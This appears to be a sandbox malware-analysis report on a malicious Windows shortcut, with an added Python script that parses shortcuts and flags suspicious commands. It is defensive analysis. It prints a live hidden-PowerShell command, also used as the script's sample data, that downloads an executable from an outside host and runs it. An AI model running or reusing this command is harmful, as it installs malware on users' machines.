                                                  Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16592
                                                  Entropy (8bit):5.410987074044769
                                                  Encrypted:false
                                                  SSDEEP:384:qt2/GhpBl5tq4S8pSVkuxA+ZQRbpwcKpGTrYv:YVPSeUkuxA+ZqGnkMv
                                                  MD5:310C4E7C2994D0CD5224D366263EF16C
                                                  SHA1:3EE7B1BFE08D17E86A520434913397849891C080
                                                  SHA-256:2E70621EAD1BAF4EFE995F61FE8B4B97127E093DCB4F763AD551793F07F38FA3
                                                  SHA-512:8DE6FF66910BB39BB7CDEB2FAC3705A904D8D12723601A4CDD90C5D68BD1F309F3089F585722FA2C5DADFC2E9CA8DF50C738275EF84438B82310E03953F9F100
                                                  Malicious:false
                                                  Preview:@...e................................................@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.4....................].D.E.............System.Data.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Users\user\AppData\Roaming\svhost.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1262592
                                                  Entropy (8bit):7.998247140834419
                                                  Encrypted:true
                                                  SSDEEP:24576:Yw03rS2BK40yMVrs+JBe0pw0H/bap4p16SM7RdkZu3svS/oUfsD:barS2BKOM/JBeYJfFP6SMdd6aRfs
                                                  MD5:D3713110654DC546BD5EDC306A6E7EFD
                                                  SHA1:DB266E554E96098584BCBB29AA2774106A7E90BF
                                                  SHA-256:97BFA0BD9F3B382280F67839C650A3D7BE16AA31F124810F3A9B9559E34619C6
                                                  SHA-512:35013774DA17EDF34B0D632766D54A55609D4C68B12DA758B26016E5590F349F0A5DD475041CC7DBF02960A67214F9917DA34B4C0D7BACDD839865D31FED8DE6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..c..............0..:...........Y... ........@.. ....................................`.................................8Y..S....`............................................................................... ............... ..H............text....9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................pY......H........M...............................................................(....*..(....*..0..~.........+q. .*.......%.....(......s.....s.......s....s.........o........,...o......o.......%.,..o......,..o.....&........X...2..*..*...4....6..@........(..V........".>`..........ej........*..0..........r...p.....(..........%......(.....%......(.....%......(.....%......(..........(....s......o......~....o.....~.........(....r...pr...p.(..........%......(.....(.....o.....~....o.....~..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5400
                                                  Entropy (8bit):3.460490990610461
                                                  Encrypted:false
                                                  SSDEEP:48:vPBls6BRnL8AIsmAs9Q+uoI8//SogZokTPM9Q+uoI8//SogZokTjH:vplZ9QAPmZ9D+dH/T09D+dH/Tr
                                                  MD5:9F73D566A530A0B1FC2724837D09E46D
                                                  SHA1:9A3C7C1C2D8C77A1F1A3EB79F019E44D3B181F2F
                                                  SHA-256:518FBC31978AD77A79734368B6CC6063DAE3C6A7AFE9E853E08D00A165F0FB00
                                                  SHA-512:075E997F617ABC4F1C53E212D081BC6AF0E20FCCF4D421EFC74D438D47720BF7450B75FEC6A4CF1B13594723A8742132FAABC39A0429E858700161EC8B6B2A4A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.`.. .....a.u.....?.6..&.}>.6......a........................P.O. .:i.....+00.:...:..,.LB.)...A&...&...........-....c.u...H".?.6......2.....BV%9 .07FF58~1.LNK..........U3mBV%9....P........................0.7.f.f.5.8.0.e.-.3.c.f.d.-.4.c.4.1.-.a.9.2.e.-.4.b.a.5.3.4.d.d.1.a.0.a...l.n.k.......n...............-.......m............./......C:\Users\user\Desktop\07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........%SystemRoot%\System32\imageres.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........................................................................................................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5400
                                                  Entropy (8bit):3.460490990610461
                                                  Encrypted:false
                                                  SSDEEP:48:vPBls6BRnL8AIsmAs9Q+uoI8//SogZokTPM9Q+uoI8//SogZokTjH:vplZ9QAPmZ9D+dH/T09D+dH/Tr
                                                  MD5:9F73D566A530A0B1FC2724837D09E46D
                                                  SHA1:9A3C7C1C2D8C77A1F1A3EB79F019E44D3B181F2F
                                                  SHA-256:518FBC31978AD77A79734368B6CC6063DAE3C6A7AFE9E853E08D00A165F0FB00
                                                  SHA-512:075E997F617ABC4F1C53E212D081BC6AF0E20FCCF4D421EFC74D438D47720BF7450B75FEC6A4CF1B13594723A8742132FAABC39A0429E858700161EC8B6B2A4A
                                                  Malicious:false
                                                  Preview:...................................FL..................F.`.. .....a.u.....?.6..&.}>.6......a........................P.O. .:i.....+00.:...:..,.LB.)...A&...&...........-....c.u...H".?.6......2.....BV%9 .07FF58~1.LNK..........U3mBV%9....P........................0.7.f.f.5.8.0.e.-.3.c.f.d.-.4.c.4.1.-.a.9.2.e.-.4.b.a.5.3.4.d.d.1.a.0.a...l.n.k.......n...............-.......m............./......C:\Users\user\Desktop\07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk.. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........%SystemRoot%\System32\imageres.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.........................................................................................................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1262592
                                                  Entropy (8bit):7.998247140834419
                                                  Encrypted:true
                                                  SSDEEP:24576:Yw03rS2BK40yMVrs+JBe0pw0H/bap4p16SM7RdkZu3svS/oUfsD:barS2BKOM/JBeYJfFP6SMdd6aRfs
                                                  MD5:D3713110654DC546BD5EDC306A6E7EFD
                                                  SHA1:DB266E554E96098584BCBB29AA2774106A7E90BF
                                                  SHA-256:97BFA0BD9F3B382280F67839C650A3D7BE16AA31F124810F3A9B9559E34619C6
                                                  SHA-512:35013774DA17EDF34B0D632766D54A55609D4C68B12DA758B26016E5590F349F0A5DD475041CC7DBF02960A67214F9917DA34B4C0D7BACDD839865D31FED8DE6
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..c..............0..:...........Y... ........@.. ....................................`.................................8Y..S....`............................................................................... ............... ..H............text....9... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................pY......H........M...............................................................(....*..(....*..0..~.........+q. .*.......%.....(......s.....s.......s....s.........o........,...o......o.......%.,..o......,..o.....&........X...2..*..*...4....6..@........(..V........".>`..........ej........*..0..........r...p.....(..........%......(.....%......(.....%......(.....%......(..........(....s......o......~....o.....~.........(....r...pr...p.(..........%......(.....(.....o.....~....o.....~..
                                                  File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=97, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                  Entropy (8bit):2.6703001446537837
                                                  TrID:
                                                  • Windows Shortcut (20020/1) 100.00%
                                                  File name:07ff580e-3cfd-4c41-a92e-4ba534dd1a0a.lnk
                                                  File size:2238
                                                  MD5:ef7f9739337bc657cd0a63e32e27d0a1
                                                  SHA1:bf67555a7272f24ceb57b1c49e4cf37dc17b246f
                                                  SHA256:a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
                                                  SHA512:e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada
                                                  SSDEEP:24:8Ad/BHYVKVWU+/CWT+Oy+brUMkWq+/E4I0aHz:8A5aby+brHCAI
                                                  TLSH:3C4103104BE50324E7F29B7A6D7AE30148767C55EE52CFCC0150919C2825621F4B4F2B
                                                  File Content Preview:L..................F.@..................................a........................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                  Icon Hash:74f4e4e4e4e9e1ed

                                                  General

                                                  Relative Path:..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Command Line Argument:-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','%APPDATA%\svhost.exe');Start-Process '%APPDATA%\svhost.exe'
                                                  Icon location:C:\Windows\System32\imageres.dll
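The three fields above (relative path, command-line arguments, icon location) are what a triage script should pull out of a shortcut before anyone double-clicks it. What follows is an added example, not code from Joe Sandbox or from this report: a minimal MS-SHLLINK parser that validates the ShellLinkHeader, skips the LinkTargetIDList and LinkInfo blocks, reads the StringData fields in their fixed order, and then applies a few regex heuristics to the arguments. The sample shortcut is constructed in memory by build_lnk from the relative path, arguments and icon location shown on this page; the IDList bytes, the ShowCommand value, the indicator names and the function names are assumptions of the example. The creation-time check flags the zero FILETIME that file(1) prints as a 1600 date in the static section below.

```python
"""Parse a Windows Shell Link (.lnk) and triage its command line (added example, not from the report)."""
import re
import struct
import sys

# ShellLinkHeader constants from MS-SHLLINK
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SHOW_CMD = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))

# Heuristics for a download-and-execute PowerShell one-liner (indicator names are this example's own).
INDICATORS = {
    "execution policy bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote download": re.compile(r"\b(?:downloadfile|downloadstring|invoke-webrequest|iwr)\b", re.I),
    "url in arguments": re.compile(r"https?://", re.I),
    "process launch": re.compile(r"\b(?:start-process|iex|invoke-expression)\b", re.I),
}


def _read_string(buf, off, unicode):
    """StringData entry: 2-byte CountCharacters, then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    return raw.decode("utf-16-le" if unicode else "latin-1"), off + count * width


def parse_lnk(buf):
    """Return header fields plus whichever StringData entries the LinkFlags say are present."""
    if (len(buf) < LNK_HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != LNK_HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link: bad HeaderSize or CLSID")
    flags = struct.unpack_from("<I", buf, 20)[0]
    ctime = struct.unpack_from("<Q", buf, 28)[0]            # CreationTime FILETIME
    icon_index, show_cmd = struct.unpack_from("<iI", buf, 56)
    off = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                                  # skip LinkTargetIDList (2-byte size prefix)
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINKINFO:                                # skip LinkInfo (its 4-byte size covers the whole struct)
        off += struct.unpack_from("<I", buf, off)[0]
    info = {"link_flags": flags, "show_command": SHOW_CMD.get(show_cmd, hex(show_cmd)),
            "icon_index": icon_index, "creation_time_zeroed": ctime == 0}
    for flag, key in STRING_FIELDS:                         # StringData always appears in this order
        if flags & flag:
            info[key], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return info


def triage(info):
    """Score the parsed shortcut: does it launch PowerShell, and what does the command line do?"""
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "")
    return {
        "spawns_powershell": target.endswith("powershell.exe"),
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(args)],
        "urls": re.findall(r"https?://[^\s'\"()]+", args),
        "creation_time_zeroed": info.get("creation_time_zeroed", False),
    }


def build_lnk(relative_path, arguments, icon_location, icon_index=97, show_cmd=7, idlist=b""):
    """Assemble a minimal Unicode .lnk with zeroed FILETIMEs, for offline testing only."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE | (HAS_IDLIST if idlist else 0)
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, 0, 0, 0, 0, icon_index, show_cmd, 0, 0, 0, 0)
    body = (struct.pack("<H", len(idlist)) + idlist) if idlist else b""
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + enc(relative_path) + enc(arguments) + enc(icon_location)


# Sample values copied from the report's General section; the IDList bytes are constructed.
SAMPLE_RELATIVE_PATH = r"..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_ARGUMENTS = (r"-ExecutionPolicy bypass -noprofile -windowstyle hidden "
                    r"(New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe',"
                    r"'%APPDATA%\svhost.exe');Start-Process '%APPDATA%\svhost.exe'")
SAMPLE_IDLIST = b"\x04\x00\x1f\x50\x00\x00"   # one 4-byte ItemID followed by the 2-byte TerminalID
SAMPLE_LNK = build_lnk(SAMPLE_RELATIVE_PATH, SAMPLE_ARGUMENTS, r"C:\Windows\System32\imageres.dll",
                       idlist=SAMPLE_IDLIST)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    parsed = parse_lnk(data)
    print(parsed)
    print(triage(parsed))
```

Run it with the path of a .lnk on disk, or with no argument to parse the constructed sample. A zeroed creation time and a system icon such as imageres.dll are weak signals on their own, since some installers write shortcuts the same way; the meaningful hit is a PowerShell target combined with a download verb, a URL and a launch verb in the arguments, which is exactly the combination the report shows here.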
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 2, 2023 08:09:15.062617064 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.062683105 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.062773943 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.083594084 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.083625078 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.203605890 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.203768969 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.209753990 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.209783077 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.210397959 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.249974966 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.249999046 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.357883930 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.357947111 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.357959032 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.358021975 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.358047009 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.358072996 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.405755997 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.405869007 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.405965090 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.405998945 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.406048059 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.406059027 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.406121969 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.453543901 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.453768969 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.453768015 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.453802109 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.453839064 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.453866005 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.453957081 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.454049110 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.454076052 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.454148054 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.454179049 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.454262972 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.454296112 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.454313040 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.454344988 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.454365015 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.494162083 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.494362116 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.501844883 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.501967907 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502055883 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502073050 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502089977 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502094984 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502127886 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502192020 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502202988 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502268076 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502343893 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502451897 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502476931 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502538919 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502562046 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502578974 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
Feb 2, 2023 08:09:15.502659082 CET | 49696 | 443 | 192.168.2.4 | 185.101.226.22
Feb 2, 2023 08:09:15.502666950 CET | 443 | 49696 | 185.101.226.22 | 192.168.2.4
                                                  Feb 2, 2023 08:09:15.502681971 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502710104 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502731085 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502738953 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502796888 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502821922 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502917051 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.502919912 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502935886 CET44349696185.101.226.22192.168.2.4
                                                  Feb 2, 2023 08:09:15.502989054 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.503019094 CET49696443192.168.2.4185.101.226.22
                                                  Feb 2, 2023 08:09:15.542584896 CET44349696185.101.226.22192.168.2.4
